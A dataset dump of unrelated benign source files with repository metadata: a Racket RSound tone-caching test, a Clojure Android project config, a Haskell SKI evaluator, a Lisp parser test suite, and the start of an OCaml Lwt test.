(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(329.6275569128699 10/127 330290)
(329.6275569128699 51/635 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 51/635 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(349.2282314330039 44/635 110020)
(349.2282314330039 44/635 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(391.99543598174927 48/635 111168)
(391.99543598174927 48/635 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(415.3046975799451 99/1270 109790)
(415.3046975799451 99/1270 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(440 91/1270 220040)
(440 91/1270 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(523.2511306011972 99/1270 109790)
(523.2511306011972 99/1270 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790))))
(list)))
(check < t1 1000)))))
| null | https://raw.githubusercontent.com/jbclements/RSound/c699db1ffae4cf0185c46bdc059d7879d40614ce/rsound/test/test-make-tone.rkt | racket | tests of integral-cycles:
this is a performance test, to see whether
caching and caching of cycles is working correctly. | #lang racket
(module+ test
(require "../main.rkt"
"../integral-cycles.rkt"
rackunit
rackunit/text-ui)
(run-tests
(test-suite
"make-tone"
(let ()
(check-equal? (cycles-to-use 441 44100.0) 1)
(check-equal? (cycles-to-use 440 44100.0) 22)
(check-equal? (cycles-to-use (* 440 (expt 2 1/12)) 44100.0) 103)
(define-values (dc t1 t2 t3)
(time-apply
(lambda ()
(map
(lambda (p) (apply make-tone p))
'((130.8127826502993 91/1270 220040)
(130.8127826502993 91/1270 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(130.8127826502993 10/127 220040)
(146.8323839587038 89/1270 330290)
(146.8323839587038 89/1270 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(146.8323839587038 10/127 330290)
(164.81377845643496 10/127 330290)
(164.81377845643496 51/635 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 51/635 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(164.81377845643496 10/127 330290)
(164.81377845643496 10/127 220040)
(174.61411571650194 44/635 110020)
(174.61411571650194 44/635 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(174.61411571650194 10/127 110020)
(195.99771799087463 48/635 111168)
(195.99771799087463 48/635 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 109790)
(195.99771799087463 10/127 111168)
(195.99771799087463 10/127 111168)
(207.65234878997256 99/1270 109790)
(207.65234878997256 99/1270 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(207.65234878997256 10/127 109790)
(220 91/1270 220040)
(220 91/1270 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(220 10/127 220040)
(261.6255653005986 91/1270 220040)
(261.6255653005986 99/1270 109790)
(261.6255653005986 91/1270 220040)
(261.6255653005986 99/1270 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(261.6255653005986 10/127 220040)
(261.6255653005986 10/127 109790)
(293.6647679174076 89/1270 330290)
(293.6647679174076 89/1270 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(293.6647679174076 10/127 330290)
(329.6275569128699 10/127 330290)
(329.6275569128699 51/635 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 51/635 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(329.6275569128699 10/127 330290)
(329.6275569128699 10/127 220040)
(349.2282314330039 44/635 110020)
(349.2282314330039 44/635 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(349.2282314330039 10/127 110020)
(391.99543598174927 48/635 111168)
(391.99543598174927 48/635 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 109790)
(391.99543598174927 10/127 111168)
(391.99543598174927 10/127 111168)
(415.3046975799451 99/1270 109790)
(415.3046975799451 99/1270 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(415.3046975799451 10/127 109790)
(440 91/1270 220040)
(440 91/1270 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(440 10/127 220040)
(523.2511306011972 99/1270 109790)
(523.2511306011972 99/1270 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790)
(523.2511306011972 10/127 109790))))
(list)))
(check < t1 1000)))))
|
bd8c11fdced73cda4a1bdc807ef683b3671e67ea78ac1648a815e4547e9701d1 | oakes/play-clj-examples | project.clj | (defproject super-koalio "0.0.1-SNAPSHOT"
:description "FIXME: write description"
:dependencies [[com.badlogicgames.gdx/gdx "1.9.3" :use-resources true]
[com.badlogicgames.gdx/gdx-backend-android "1.9.3"]
[com.badlogicgames.gdx/gdx-box2d "1.9.3"]
[com.badlogicgames.gdx/gdx-bullet "1.9.3"]
[neko/neko "3.2.0"]
[org.clojure-android/clojure "1.7.0-r4" :use-resources true]
[play-clj "1.1.1"]]
:profiles {:dev {:dependencies [[org.clojure-android/tools.nrepl "0.2.6-lollipop"]]
:android {:aot :all-with-unused}}
:release {:android
{;; Specify the path to your private
;; keystore and the the alias of the
;; key you want to sign APKs with.
;; :keystore-path "/home/user/.android/private.keystore"
;; :key-alias "mykeyalias"
:aot :all}}}
:android {;; Specify the path to the Android SDK directory either
;; here or in your ~/.lein/profiles.clj file.
;; :sdk-path "/home/user/path/to/android-sdk/"
;; Uncomment this if dexer fails with OutOfMemoryException
;; :force-dex-optimize true
:assets-paths ["../desktop/resources"]
:native-libraries-paths ["libs"]
:target-version "15"
:aot-exclude-ns ["clojure.parallel" "clojure.core.reducers"
"cljs-tooling.complete" "cljs-tooling.info"
"cljs-tooling.util.analysis" "cljs-tooling.util.misc"
"cider.nrepl" "cider-nrepl.plugin"]
:dex-opts ["-JXmx4096M"]}
:source-paths ["src/clojure" "../desktop/src-common"]
:java-source-paths ["src/java"]
:javac-options ["-target" "1.6" "-source" "1.6" "-Xlint:-options"])
| null | https://raw.githubusercontent.com/oakes/play-clj-examples/449a505a068faeeb35d4ee4622c6a05e3fff6763/super-koalio/android/project.clj | clojure | Specify the path to your private
keystore and the the alias of the
key you want to sign APKs with.
:keystore-path "/home/user/.android/private.keystore"
:key-alias "mykeyalias"
Specify the path to the Android SDK directory either
here or in your ~/.lein/profiles.clj file.
:sdk-path "/home/user/path/to/android-sdk/"
Uncomment this if dexer fails with OutOfMemoryException
:force-dex-optimize true | (defproject super-koalio "0.0.1-SNAPSHOT"
:description "FIXME: write description"
:dependencies [[com.badlogicgames.gdx/gdx "1.9.3" :use-resources true]
[com.badlogicgames.gdx/gdx-backend-android "1.9.3"]
[com.badlogicgames.gdx/gdx-box2d "1.9.3"]
[com.badlogicgames.gdx/gdx-bullet "1.9.3"]
[neko/neko "3.2.0"]
[org.clojure-android/clojure "1.7.0-r4" :use-resources true]
[play-clj "1.1.1"]]
:profiles {:dev {:dependencies [[org.clojure-android/tools.nrepl "0.2.6-lollipop"]]
:android {:aot :all-with-unused}}
:release {:android
:aot :all}}}
:assets-paths ["../desktop/resources"]
:native-libraries-paths ["libs"]
:target-version "15"
:aot-exclude-ns ["clojure.parallel" "clojure.core.reducers"
"cljs-tooling.complete" "cljs-tooling.info"
"cljs-tooling.util.analysis" "cljs-tooling.util.misc"
"cider.nrepl" "cider-nrepl.plugin"]
:dex-opts ["-JXmx4096M"]}
:source-paths ["src/clojure" "../desktop/src-common"]
:java-source-paths ["src/java"]
:javac-options ["-target" "1.6" "-source" "1.6" "-Xlint:-options"])
|
07b3be5de04087fc69accc6989936252070a42dff3e5fc31c7868cbd53a8b924 | ekmett/coda | Meta2.hs | module Meta2 where
data Neutral = S0 | S1 !Term | S2 !Term !Term | K0 | K1 !Term | I0 deriving Show
data Term = N Neutral | A Neutral !Term !Term
instance Show Term where
showsPrec d (N l) = showsPrec d l
showsPrec d (A _ l r) = showParen (d > 10) $ showString "A " . showsPrec 11 l . showChar ' ' . showsPrec 11 r
infixl 9 `call`
call :: Neutral -> Term -> Neutral
call S0 (N K0) = K1 (N I0) -- SK=KI
call S0 x = S1 x
call (S1 x) y = S2 x y
call (S2 x y) z = eval x `call` z `call` app y z
call K0 x = K1 x
call (K1 x) _ = eval x
call I0 x = eval x
eval :: Term -> Neutral
eval (N t) = t
eval (A t _ _) = t
-- application with opportunistic optimization
app :: Term -> Term -> Term
app (N S0) (N K0) = N (K1 (N I0)) -- SK=KI
app (N S0) x = N (S1 x)
app (N (S1 x)) y = N (S2 x y)
app (N K0) x = N (K1 x)
app (N I0) x = x
app l r = A (eval l `call` r) l r
_S0, _K0, _I0 :: Term
_S0 = N S0
_K0 = N K0
_I0 = N I0
| null | https://raw.githubusercontent.com/ekmett/coda/bca7e36ab00036f92d94eb86298712ab1dbf9b8d/ref/ski/Meta2.hs | haskell | SK=KI
application with opportunistic optimization
SK=KI | module Meta2 where
data Neutral = S0 | S1 !Term | S2 !Term !Term | K0 | K1 !Term | I0 deriving Show
data Term = N Neutral | A Neutral !Term !Term
instance Show Term where
showsPrec d (N l) = showsPrec d l
showsPrec d (A _ l r) = showParen (d > 10) $ showString "A " . showsPrec 11 l . showChar ' ' . showsPrec 11 r
infixl 9 `call`
call :: Neutral -> Term -> Neutral
call S0 x = S1 x
call (S1 x) y = S2 x y
call (S2 x y) z = eval x `call` z `call` app y z
call K0 x = K1 x
call (K1 x) _ = eval x
call I0 x = eval x
eval :: Term -> Neutral
eval (N t) = t
eval (A t _ _) = t
app :: Term -> Term -> Term
app (N S0) x = N (S1 x)
app (N (S1 x)) y = N (S2 x y)
app (N K0) x = N (K1 x)
app (N I0) x = x
app l r = A (eval l `call` r) l r
_S0, _K0, _I0 :: Term
_S0 = N S0
_K0 = N K0
_I0 = N I0
|
d474bf8143811792f5fdee9854c31d377c03b5536a3128b031260c1c5d6056a0 | nibbula/yew | parse-util-test.lisp | ;;;
parse-util-test.lisp - Tests for parse - util
;;;
(defpackage :parse-util-test
(:documentation "Tests for parse-util")
(:use :cl :test :parse-util)
(:export
#:run
))
(in-package :parse-util-test)
(defmacro parse-eq (value expr)
`(multiple-value-bind (status result) ,expr
(and status (equal result ,value))))
(defun parse-path (path)
"Parse a unix path."
(with-parsing (path :track-next t)
;; This is so we can distinguish between relative and absolute paths.
Absolute paths will have a " / " as the first element .
(optional
(note ("/") (is-element #\/)))
(zero-or-more
(one-of
(one-or-more (is-element #\/))
(with-sub-sequence (element)
(note (element)
(one-or-more
(is-not-element #\/))))))))
(deftests (parse-util-path)
(parse-eq '() (parse-path ""))
(parse-eq '("/") (parse-path "/"))
(parse-eq '("foo" "bar") (parse-path "foo/bar"))
(parse-eq '("/" "foo" "bar") (parse-path "/foo/bar"))
(parse-eq '("/" "foo" "bar") (parse-path "///foo///bar///"))
(parse-eq '("asdfjk\\" "zurp.aj;l" "d")
(parse-path "asdfjk\\/zurp.aj;l/d")))
(defun parse-command (line)
(with-parsing (line)
(sequence-of
(one-of (note ("corge") (is-sequence "corge"))
(note ("gralt") (is-sequence "gralt"))
(note ("egg") (is-sequence "egg"))
(note ("cat") (is-sequence "cat")))
(zero-or-more
(one-or-more (is-element #\space))
(with-sub-sequence (word)
(note (word) (one-or-more (is-not-element #\space))))))))
(deftests (parse-util-command)
(not (parse-command ""))
(parse-eq '("corge") (parse-command "corge"))
(parse-eq '("cat") (parse-command "cat"))
(parse-eq '("cat" "food" "in" "cans") (parse-command "cat food in cans"))
(parse-eq '("egg" "is" "good") (parse-command "egg is good"))
(not (parse-command "can cat?")))
(defun parse-url (url)
(with-parsing (url :track-next t)
(optional
(sequence-of
(with-sub-sequence (scheme)
(note ((list :scheme scheme))
(one-or-more (and (not (in-sequence ":/?#")) (next-element)))))
(is-element #\:)))
(optional
(sequence-of
(is-sequence "//")
(with-sub-sequence (host)
(note (`(:host ,host))
(zero-or-more (and (not (in-sequence "/?#")) (next-element)))))))
(let (path)
(note (`(:path ,@(nreverse path)))
(zero-or-more
(one-of
(one-or-more (is-element #\/))
(with-sub-sequence (element)
(and
(one-or-more
(and (not (in-sequence "/?#")) (next-element)))
(push element path)))))))
(optional
(sequence-of
(is-element #\?)
(with-sub-sequence (query)
(note (`(:query ,query))
(zero-or-more
(is-not-element #\#))))))
(optional
(sequence-of
(is-element #\#)
(with-sub-sequence (fragment)
(note (`(:fragment ,fragment))
(zero-or-more
(is-not-element #\#))))))))
(deftests (parse-util-url)
(parse-eq '((:scheme "nibs") (:host "") (:path)) (parse-url "nibs://"))
(parse-eq '((:scheme "ftp") (:host "example.org") (:path "ding" "bats"))
(parse-url "ftp/"))
(parse-eq '((:scheme "http") (:host "example.com") (:path "hi" "there")
(:query "fish") (:fragment "food"))
(parse-url "#food"))
(not (parse-command "hoop:dupe/scoop&loops")))
(deftests (parse-util-all :doc "Test :parse-util.")
parse-util-path
parse-util-command
parse-util-url)
(defun run ()
(run-group-name 'parse-util-all :verbose t))
;; End
| null | https://raw.githubusercontent.com/nibbula/yew/8ce7130b1d6c58fe44a38ed58a1f59285a71935c/lib/parse-util-test.lisp | lisp |
This is so we can distinguish between relative and absolute paths.
End | parse-util-test.lisp - Tests for parse - util
(defpackage :parse-util-test
(:documentation "Tests for parse-util")
(:use :cl :test :parse-util)
(:export
#:run
))
(in-package :parse-util-test)
(defmacro parse-eq (value expr)
`(multiple-value-bind (status result) ,expr
(and status (equal result ,value))))
(defun parse-path (path)
"Parse a unix path."
(with-parsing (path :track-next t)
Absolute paths will have a " / " as the first element .
(optional
(note ("/") (is-element #\/)))
(zero-or-more
(one-of
(one-or-more (is-element #\/))
(with-sub-sequence (element)
(note (element)
(one-or-more
(is-not-element #\/))))))))
(deftests (parse-util-path)
(parse-eq '() (parse-path ""))
(parse-eq '("/") (parse-path "/"))
(parse-eq '("foo" "bar") (parse-path "foo/bar"))
(parse-eq '("/" "foo" "bar") (parse-path "/foo/bar"))
(parse-eq '("/" "foo" "bar") (parse-path "///foo///bar///"))
(parse-eq '("asdfjk\\" "zurp.aj;l" "d")
(parse-path "asdfjk\\/zurp.aj;l/d")))
(defun parse-command (line)
(with-parsing (line)
(sequence-of
(one-of (note ("corge") (is-sequence "corge"))
(note ("gralt") (is-sequence "gralt"))
(note ("egg") (is-sequence "egg"))
(note ("cat") (is-sequence "cat")))
(zero-or-more
(one-or-more (is-element #\space))
(with-sub-sequence (word)
(note (word) (one-or-more (is-not-element #\space))))))))
(deftests (parse-util-command)
(not (parse-command ""))
(parse-eq '("corge") (parse-command "corge"))
(parse-eq '("cat") (parse-command "cat"))
(parse-eq '("cat" "food" "in" "cans") (parse-command "cat food in cans"))
(parse-eq '("egg" "is" "good") (parse-command "egg is good"))
(not (parse-command "can cat?")))
(defun parse-url (url)
(with-parsing (url :track-next t)
(optional
(sequence-of
(with-sub-sequence (scheme)
(note ((list :scheme scheme))
(one-or-more (and (not (in-sequence ":/?#")) (next-element)))))
(is-element #\:)))
(optional
(sequence-of
(is-sequence "//")
(with-sub-sequence (host)
(note (`(:host ,host))
(zero-or-more (and (not (in-sequence "/?#")) (next-element)))))))
(let (path)
(note (`(:path ,@(nreverse path)))
(zero-or-more
(one-of
(one-or-more (is-element #\/))
(with-sub-sequence (element)
(and
(one-or-more
(and (not (in-sequence "/?#")) (next-element)))
(push element path)))))))
(optional
(sequence-of
(is-element #\?)
(with-sub-sequence (query)
(note (`(:query ,query))
(zero-or-more
(is-not-element #\#))))))
(optional
(sequence-of
(is-element #\#)
(with-sub-sequence (fragment)
(note (`(:fragment ,fragment))
(zero-or-more
(is-not-element #\#))))))))
(deftests (parse-util-url)
(parse-eq '((:scheme "nibs") (:host "") (:path)) (parse-url "nibs://"))
(parse-eq '((:scheme "ftp") (:host "example.org") (:path "ding" "bats"))
(parse-url "ftp/"))
(parse-eq '((:scheme "http") (:host "example.com") (:path "hi" "there")
(:query "fish") (:fragment "food"))
(parse-url "#food"))
(not (parse-command "hoop:dupe/scoop&loops")))
(deftests (parse-util-all :doc "Test :parse-util.")
parse-util-path
parse-util-command
parse-util-url)
(defun run ()
(run-group-name 'parse-util-all :verbose t))
|
938dd8ad98414842b53bc05698c1bc458ee3cca59abfeba4d4897caadc489b39 | ocsigen/lwt | test_lwt_engine.ml | This file is part of Lwt , released under the MIT license . See LICENSE.md for
details , or visit .
details, or visit . *)
open Test
open Lwt.Infix
let selection_tests = [
test "libev: default when enabled in build bot"
(fun () ->
if not Lwt_config._HAVE_LIBEV then Lwt.return_true
else
Check if this is running inside or AppVeyor .
let in_travis =
try ignore (Sys.getenv "TRAVIS_COMMIT"); true
with Not_found -> false
in
let in_appveyor =
try ignore (Sys.getenv "APPVEYOR_REPO_COMMIT"); true
with Not_found -> false
in
if not (in_travis || in_appveyor) then Lwt.return_true
else Lwt.return Lwt_config.libev_default);
]
let tests = selection_tests
let timing_tests = [
test "libev: timer delays are not too short" begin fun () ->
let start = Unix.gettimeofday () in
Lwt.catch
(fun () ->
Block the entire process for one second . If using libev , libev 's
notion of the current time is not updated during this period .
notion of the current time is not updated during this period. *)
let () = Unix.sleep 1 in
At this point , thinks that the time is what it was about one
second ago . Now schedule exception Lwt_unix . Timeout to be raised in
0.5 seconds . If the implementation is incorrect , the exception will
be raised immediately , because the 0.5 seconds will be measured
relative to libev 's " current " time of one second ago .
second ago. Now schedule exception Lwt_unix.Timeout to be raised in
0.5 seconds. If the implementation is incorrect, the exception will
be raised immediately, because the 0.5 seconds will be measured
relative to libev's "current" time of one second ago. *)
Lwt_unix.timeout 0.5)
(function
| Lwt_unix.Timeout ->
Lwt.return (Unix.gettimeofday ())
| exn ->
Lwt.fail exn)
>>= fun stop ->
Lwt.return (stop -. start >= 1.5)
end;
]
let tests = tests @ timing_tests
let run_tests = [
test "Lwt_main.run: nested call" ~sequential:true begin fun () ->
(* The test itself is already running under Lwt_main.run, so we just have to
call it once and make sure we get an exception. *)
(* Make sure we are running in a callback called by Lwt_main.run, not
synchronously when the testing executable is loaded. *)
Lwt.pause () >>= fun () ->
try
Lwt_main.run (Lwt.return_unit);
Lwt.return_false
with Failure _ ->
Lwt.return_true
end;
]
let tests = tests @ run_tests
let suite = suite "lwt_engine" tests
| null | https://raw.githubusercontent.com/ocsigen/lwt/aa9d18a550da444e1a889867dad52a32f162b262/test/unix/test_lwt_engine.ml | ocaml | The test itself is already running under Lwt_main.run, so we just have to
call it once and make sure we get an exception.
Make sure we are running in a callback called by Lwt_main.run, not
synchronously when the testing executable is loaded. | This file is part of Lwt , released under the MIT license . See LICENSE.md for
details , or visit .
details, or visit . *)
open Test
open Lwt.Infix
let selection_tests = [
test "libev: default when enabled in build bot"
(fun () ->
if not Lwt_config._HAVE_LIBEV then Lwt.return_true
else
Check if this is running inside or AppVeyor .
let in_travis =
